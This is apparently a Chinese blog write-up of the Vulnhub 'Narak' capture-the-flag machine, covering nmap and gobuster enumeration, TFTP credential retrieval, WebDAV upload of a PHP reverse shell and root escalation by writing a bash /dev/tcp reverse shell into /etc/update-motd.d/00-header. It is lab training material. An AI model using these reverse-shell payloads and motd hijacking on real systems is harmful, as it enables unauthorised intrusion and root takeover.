首页 > 其他分享 >Narak靶机渗透 (Vulnhub内网渗透)

Narak靶机渗透 (Vulnhub内网渗透)

时间:2024-11-04 14:21:40浏览次数:1  
标签:shell 渗透 root 192.168 Vulnhub 80.130 txt 内网 php

一、渗透目标:

Description
Back to the Top
Narak is the Hindu equivalent of Hell. You are in the pit with the Lord of Hell himself. 
Can you use your hacking skills to get out of the Narak? Burning walls and demons are 
around every corner even your trusty tools will betray you on this quest. Trust no one. 
Just remember the ultimate mantra to escape Narak “Enumeration”. After getting the root you
will indeed agree “Hell ain’t a bad place to be”.

Objective: Find 2 flags (user.txt and root.txt)

需要拿到两个 flag值,分别位于 user.txt 和 root.txt中,root.txt需要获取root权限才能读取 -> 需要进行提权。

二、环境准备:

1、攻击机 -> Kali_linux -> ip:192.168.80.129
2、靶机:https://download.vulnhub.com/ha/narak.ova

三、渗透记录:

1、内网信息搜集:

(1) 查看内网存活主机:

nmap -sn 192.168.80.0/24

image

探测到目标主机内网ip为 192.168.80.130

(2) 探测目标主机存活端口:

nmap --min-rate 10000 192.168.80.130

image

探测到目标主机 22、80端口开放

(3) 探测两个存活端口的详细信息:

nmap -sT -sV -sC -O -p22, 80 192.168.80.130

image

未发现可利用敏感信息

(4) TCP扫描探测结束,进行UDP协议探测:

先使用全端口扫描:

nmap -sU --min-rate 10000 192.168.80.130

image

全端口扫描结果显示没有探测到开放端口。

再使用 top20 端口进行扫描:

nmap -sU --min-rate 10000 --top-ports 20 192.168.80.130

image

与全端口探测不同,这次探测到有部分端口开放,这就是 nmap可能存在欺骗的点。

(5) 使用 gobuster 进行目录爆破:

gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.80.130

image

共爆破出三个路径:
/images, /webdav, /server-status

其中 /images 目录为图片目录,无敏感信息与文件上传接口:
image

/webdav目录需要使用账密进行登录

WebDAV(Web Distributed Authoring and Versioning,即“Web分布式创作和版本控制”)是一种基于HTTP
协议的扩展,它允许用户通过网络远程管理和编辑文件。简单来说,WebDAV 让你可以在网上像操作本地文件一
样操作远程服务器上的文件。

image

(6) 但是 gobuster工具默认对某些特定目录不进行扫描爆破,手动添加未扫描后缀进行爆破:

gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x zip,rar,txt,sql,php,html -u http://192.168.80.130

image

探测到 /tips.txt,使用 curl命令访问 /tips.txt

curl http://192.168.80.130/tips.txt

image

文件内容提示 "地狱之门位于 creds.txt 文件中"

2、tftp渗透:

TFTP(Trivial File Transfer Protocol,简单文件传输协议)是TCP/IP协议族中的一个用来在客户机与服务
器之间进行简单文件传输的协议,提供不复杂、开销不大的文件传输服务。端口号为69。

(1) 尝试利用 tftp协议,将 creds.txt文件从目标靶机服务器中下载下来并进行读取:

//首先 tftp协议连接靶机:
tftp 192.168.80.130

//将 creds.txt从目标靶机服务器中下载下来
get creds.txt

//下载结束后断开连接
quit

image

(2) 使用 Kali攻击机进行读取:

cat /creds.txt

image

进行base64解码后得到一套账密。

(3) 首先猜测为 ssh连接账密,尝试ssh连接:

ssh [email protected]

image

密码错误,此账密非 ssh连接账密,于是判断其为 wevdav连接账密。

3、webdav渗透:

(1) 登录 webdav后,可以看到webdav中管理的文件,可以采取上传木马的方式,进行反弹shell,以此getshell获取初步权限:

image

(2) 查看当前用户有哪些文件的上传权限,以此来判断上传什么类型的木马:

davtest -url http://192.168.80.130/webdav -auth yamdoot:Swarg

image

可以看到有 .php, .html, .txt三种文件类型的上传权限,所以可以采用上传.php木马的方式 getshell

(3) 构造 shell.php:

//首先新建 shell.php文件
vim shell.php

//使用 vim命令写入shell命令并保存:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.80.129/2333 0>&1'");?>

image

image

(4) 利用cadaver上传 shell.php:

//连接 webdav
cadaver http://192.168.80.130/webdav -> 账密 yamdoot:Swarg

//上传 shell.php
put shell.php

image

(5) 利用shell.php 文件 getshell:

在Kali_linux本地起一个监听,监听 2333端口:

nc -lnvp 2333

image

访问 shell.php 进行反弹shell:

image

成功 getshell:

image

5、渗透 getshell:

(1) 筛选并查看可以利用的提权文件:

find / -writable -type f -not -path "/proc/*" -not -path "/sys/*" -not -path "/var/*" 2>/dev/null

image

(2) 可以看到存一个 名为/mnt/hell.sh的shell脚本文件,读取其中信息:

cat /mnt/hell.sh

image

内容包含一段密文,该密文是一段名为 "brainfuck" 的编程语言,利用工具对其进行解密即可:

在 Kali_linux攻击机本地创建一个 hell.bf文件并将密文写入,随后使用工具解密:

//创建 hell.bf
vim hell.bf

//使用 beef工具解密:
beef hell.bf

image

得到解密后的密文 : chitragupt

(3) 猜测 chitragupt 可能为某用户的密码,于是查看 /etc/passwd 配置文件,配合文件中的用户名进行匹配测试:

cat /etc/passwd

image

可得系统中存在四个用户,分别是 root, narak, yamdoot, inferno

在 Kali_linux本地攻击机,使用 ssh连接和密码去和每一个用户进行匹配测试:

image

成功连接 inferno用户,获取用户权限。

(4) 查找并获取flag,经搜索,flag位于 user.txt中:

//查看所有文件
ls -all

//获取flag -> user.txt
cat user.txt

image

6、渗透提权:

(1) 查看当前用户权限:

sudo -l

image

当前 inferno用户没有使用 sudo命令的权限,只能采用他法。

(2) 同理使用命令查看可能进行提权的敏感文件:

find / -writable -type f -not -path "/proc/*" -not -path "/sys/*" -not -path "/var/*" 2>/dev/null

image

可以看到 interfo用户拥有对 /etc/update-motd.d/ 文件的写权限。

(3) motd渗透:

motd(Message of the Day)是Unix和类Unix系统(如Linux)中的一种机制,用于在用户登录时显示一条消
息。这个消息通常包含系统信息、警告、通知或其他重要信息。

/etc/update-motd.d/是一个目录,包含多个脚本文件,这些脚本在用户登录时会被依次执行,生成动态的
motd 内容。

其中 /etc/update-motd.d/00-header作用即为显示用户登录时的 "欢迎登录" 的信息。
此时 inferno用户拥有对 /etc/update-motd.d/00-header的写权限,可以在 /etc/update-motd.d/00-header中写入shell,用户登录时自动执行shell,以此反弹 root管理员的权限,从而进行 root getshell。

echo "/bin/bash 'bash -i >& /dev/tcp/192.168.80.129/2333 0>&1' >> /etc/update-motd.d/00-header"

image

起一个监听,监听2333端口,并重新ssh连接 inferno用户,使其触发反弹shell:

image

成功获取 root权限。进入 root目录,访问 root.txt,即可获取 flag2:

image

标签:shell,渗透,root,192.168,Vulnhub,80.130,txt,内网,php
From: https://www.cnblogs.com/kgty/p/18524606

相关文章

  • 渗透测试导学
     学习地点(泷羽sec的个人空间-泷羽sec个人主页-哔哩哔哩视频(bilibili.com))渗透测试是干什么        渗透测试的定义和目的                通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全性能的评估方法。它的目的是通过识别安全问题,帮助了......
  • Me-and-My-Girlfriend-1靶机渗透 (Vulnhub内网渗透)
    一、Me-and-My-Girlfriend-1:1、渗透目标:Description:ThisVMtellsusthatthereareacoupleofloversnamelyAliceandBob,wherethecouplewasoriginallyveryromantic,butsinceAliceworkedataprivatecompany,"CebanCorp",somethinghaschan......
  • 渗透测试--Fuzzing Web应用
    总体思路        当我们发现一个Web应用的时候,我们可以从Web的各个层面发起信息搜集。比如Web目录,了解Web页面的后端语言,揭露后端文件的参数,揭露后端文件参数的可选值,爆破子域名、获取私有域名等。这些信息将帮助我们进一步渗透,有时候会起到关键作用。其实其核心点就......
  • 跟着红队笔记学习 tmux:渗透测试中的多终端利器
    内容预览≧∀≦ゞ跟着红队笔记学习tmux:渗透测试中的多终端利器进入tmux前的准备tmux概念简介tmux基础操作会话管理命令会话管理快捷键会话内和会话外命令的区别tmux窗口和面板管理新建和管理窗口分割窗口为面板切换面板面板放大与恢复调整面板大小关闭面板分屏......
  • 内网模块放开外网访问和 cdn
    确实,如果您的应用未来需要扩展到外网,直接在服务器上安装SSL/TLS证书,并通过Nginx将所有请求转换为HTTPS是基本的步骤。然而,为了确保平滑迁移和系统的长期可维护性,还有一些其他因素需要考虑:证书管理:证书获取:选择一个合适的证书颁发机构(CA)来获取SSL/TLS证书,或者使用像L......
  • 渗透测试常用windows命令
    渗透测试是一种评估计算机系统、网络或Web应用安全性的实践,它通过模拟恶意黑客的攻击手段来识别潜在的安全漏洞。在渗透测试过程中,使用Windows命令行工具可以帮助测试者进行信息收集、系统分析等操作。以下是一些渗透测试中常用的Windows命令:1.**系统信息收集**  -`syst......
  • 记一次“网络安全扫描工具联动”自动化扫描漏洞流程,网络渗透必看基础教程!
    大家好,我是向阳假如你在一次攻防演练或者渗透测试中有多个攻击测试目标,一个一个去手动测试是肯定不现实的,可以先借助安全扫描工具去“自动扫描测试目标站点”的薄弱漏洞的位置,为你后续的深入测试提供事半功倍的效果。前言:随着当前网络安全威胁的不断扩展与升级,开展渗透测......
  • 内网机安装docker
    1)关闭防火墙关闭systemctlstopfirewalld禁止开机启动防火墙systemctldisablefirewalld2).下载docker的安装包:可以直接使用该链接进行下载:https://download.docker.com/linux/static/stable/x86_64/docker-20.10.9.tgz也可访问官网选择匹配自己系统的版本进行下载:I......
  • 网络安全渗透测试写法
    xss谝:CSP:设置白名单,只允许特定来源的脚本和资源加载,阻止不在白名单中的脚本执行Content-Security-Policy:default-src'self';script-src'self';style-src'self';img-src'self'data:;XSS保护头X-XSS-Protection:1;mode=blockphp中使用htmlspecialc......
  • NVR录像机汇聚管理EasyNVR多品牌NVR管理工具/设备在内网播放WebRTC流,显示一直加载中是
    在科技日新月异的今天,各行各业都在经历着前所未有的变革。视频监控技术,作为安全防范体系的重要组成部分,更是随着技术的演进不断升级,以适应更加复杂多变的安全需求。NVR录像机汇聚管理EasyNVR,作为一款集视频流处理、录像存储、分发管理等功能于一体的综合性视频监控云平台,正是这......